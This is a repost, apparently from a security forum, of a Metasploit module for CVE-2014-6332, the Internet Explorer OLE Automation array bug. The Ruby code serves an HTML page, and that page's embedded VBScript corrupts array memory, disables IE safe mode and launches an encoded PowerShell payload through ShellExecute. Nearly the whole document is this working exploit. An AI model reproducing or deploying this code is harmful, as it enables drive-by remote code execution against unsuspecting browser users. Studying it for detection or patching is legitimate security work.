akkiliON

Internet Explorer OLE Automation Array Remote Code Execution (msf)



##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

# Metasploit browser-exploit module for CVE-2014-6332 (Windows OLE Automation
# array remote code execution reached through Internet Explorer, the issue
# addressed by the 2014 Microsoft bulletin named in the description below).
# The module hosts one HTML page; the VBScript embedded in that page launches a
# PowerShell command line derived from the configured payload. The browser-side
# script performs its own User-Agent checks, so the Ruby side needs no target
# selection and exposes a single 'Automatic' target.
class Metasploit3 < Msf::Exploit::Remote
# Module reliability rank (framework constant).
Rank = ExcellentRanking

# HttpServer::HTML serves the page over HTTP; Powershell provides
# cmd_psh_payload, used in on_request_uri to build the command line.
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Powershell

# Registers module metadata: name, references, payload constraints, platform
# and targets. +info+ is merged into the defaults via update_info.
def initialize(info={})
super(update_info(info,
'Name' => "Windows OLE Automation Array Remote Code Execution",
'Description' => %q{
This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.
Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'IBM', # Discovery
'yuange <twitter.com/yuange75>', # PoC
'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit
'Wesley Neelen <security[at]forsec.nl>' #Metasploit
],
'References' =>
[
[ 'CVE', '2014-6332' ]
],
'Payload' =>
{
'BadChars' => "\x00", # payload may not contain NUL bytes
},
'DefaultOptions' =>
{
'EXITFUNC' => "none"
},
'Platform' => 'win',
# One target only: version handling happens in the served VBScript.
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false, # module does not claim elevated privileges
'DisclosureDate' => "November 12 2014",
'DefaultTarget' => 0))
end

# HTTP handler invoked by the HttpServer mixin for each request to the module
# URI. +cli+ is the client connection; +request+ is the parsed request and is
# not inspected here, so every request receives the same page.
def on_request_uri(cli, request)
# Build a powershell.exe command line for the encoded payload
# (:remove_comspec asks the mixin to omit its cmd.exe wrapper). The leading
# "powershell.exe " is cut off because the VBScript below hands the executable
# and its arguments to ShellExecute as separate parameters.
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
payl.slice! "powershell.exe "

# The whole page is a heredoc string; apart from the #{payl} interpolation it is
# sent verbatim, including the embedded VBScript (the public PoC for this CVE).
# For detection purposes note the fixed artefacts in the response: the
# X-UA-Compatible meta tag forcing IE8 emulation and two inline VBScript blocks,
# the first of which calls Shell.Application.ShellExecute on powershell.exe.
html = <<-EOS
<!doctype html>

<html>

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >

<head>

</head>

<body>


<SCRIPT LANGUAGE="VBScript">


function trigger()

On Error Resume Next

set shell=createobject("Shell.Application")

shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1

end function


</script>


<SCRIPT LANGUAGE="VBScript">



dim aa()

dim ab()

dim a0

dim a1

dim a2

dim a3

dim win9x

dim intVersion

dim rnda

dim funclass

dim myarray


Begin()


function Begin()

On Error Resume Next

info=Navigator.UserAgent


if(instr(info,"Win64")>0) then

exit function

end if


if (instr(info,"MSIE")>0) then

intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))

else

exit function



end if


win9x=0


BeginInit()

If Create()=True Then

myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)

myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)


if(intVersion<4) then

document.write("<br> IE")

document.write(intVersion)

runshellcode()

else

setnotsafemode()

end if

end if

end function


function BeginInit()

Randomize()

redim aa(5)

redim ab(5)

a0=13+17*rnd(6)

a3=7+3*rnd(5)

end function


function Create()

On Error Resume Next

dim i

Create=False

For i = 0 To 400

If Over()=True Then

' document.write(i)

Create=True

Exit For

End If

Next

end function


sub testaa()

end sub


function mydata()

On Error Resume Next

i=testaa

i=null

redim Preserve aa(a2)



ab(0)=0

aa(a1)=i

ab(0)=6.36598737437801E-314


aa(a1+2)=myarray

ab(2)=1.74088534731324E-310

mydata=aa(a1)

redim Preserve aa(a0)

end function



function setnotsafemode()

On Error Resume Next

i=mydata()

i=readmemo(i+8)

i=readmemo(i+16)

j=readmemo(i+&h134)

for k=0 to &h60 step 4

j=readmemo(i+&h120+k)

if(j=14) then

j=0

redim Preserve aa(a2)

aa(a1+2)(i+&h11c+k)=ab(4)

redim Preserve aa(a0)


j=0

j=readmemo(i+&h120+k)



Exit for

end if


next

ab(2)=1.69759663316747E-313

trigger()

end function


function Over()

On Error Resume Next

dim type1,type2,type3

Over=False

a0=a0+a3

a1=a0+2

a2=a0+&h8000000



redim Preserve aa(a0)

redim ab(a0)



redim Preserve aa(a2)



type1=1

ab(0)=1.123456789012345678901234567890

aa(a0)=10



If(IsObject(aa(a1-1)) = False) Then

if(intVersion<4) then

mem=cint(a0+1)*16

j=vartype(aa(a1-1))

if((j=mem+4) or (j*8=mem+8)) then

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

else

redim Preserve aa(a0)

exit function


end if

else

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

end if

end if





If(type1=&h2f66) Then

Over=True

End If

If(type1=&hB9AD) Then

Over=True

win9x=1

End If


redim Preserve aa(a0)



end function


function ReadMemo(add)

On Error Resume Next

redim Preserve aa(a2)



ab(0)=0

aa(a1)=add+4

ab(0)=1.69759663316747E-313

ReadMemo=lenb(aa(a1))



ab(0)=0



redim Preserve aa(a0)

end function


</script>


</body>

</html>
EOS

# Log to the framework console, then deliver the page as text/html.
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})

end

end

Sursă: Internet Explorer OLE Automation Array Remote Code Execution (msf)
